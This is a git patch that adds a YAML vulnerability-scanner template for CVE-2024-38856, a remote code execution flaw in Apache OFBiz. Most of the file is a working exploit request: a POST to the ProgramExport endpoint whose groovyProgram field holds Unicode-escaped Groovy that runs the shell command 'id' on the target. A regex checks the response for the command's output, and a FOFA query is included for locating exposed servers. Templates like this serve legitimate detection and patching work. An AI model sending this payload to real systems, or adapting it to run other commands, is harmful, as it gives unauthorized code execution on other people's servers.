From 8b3178d0f6e44415dbd62d8173ee0f11dc8b09f0 Mon Sep 17 00:00:00 2001 From: Co5mos Date: Mon, 5 Aug 2024 17:16:52 +0800 Subject: [PATCH] Create CVE-2024-38856.yaml --- http/cves/2024/CVE-2024-38856.yaml | 33 ++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 http/cves/2024/CVE-2024-38856.yaml diff --git a/http/cves/2024/CVE-2024-38856.yaml b/http/cves/2024/CVE-2024-38856.yaml new file mode 100644 index 0000000000..33c6d987df --- /dev/null +++ b/http/cves/2024/CVE-2024-38856.yaml @@ -0,0 +1,33 @@ +id: CVE-2024-38856 + +info: + name: Apache OFBiz RCE (CVE-2024-38856) + author: Co5mos + severity: critical + description: | + 在apache ofbiz 12.14中,有远程命令执行。用户可以使用特定的 url 来绕过过滤器检测,从而导致未经授权执行 goorvy 代码。 + reference: + - https://unam4.github.io/2024/08/05/CVE-2024-38856-ofbiz-12-14-filter%E7%BB%95%E8%BF%87%E5%88%B0rce/ + metadata: + fofa-query: 'app="Apache_OFBiz"' + tags: rce,apache,ofbiz,cve,cve2024 + +http: + - raw: + - | + POST /webtools/control/main/ProgramExport HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0069\u0064\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - 'uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)' + + - type: status + status: + - 200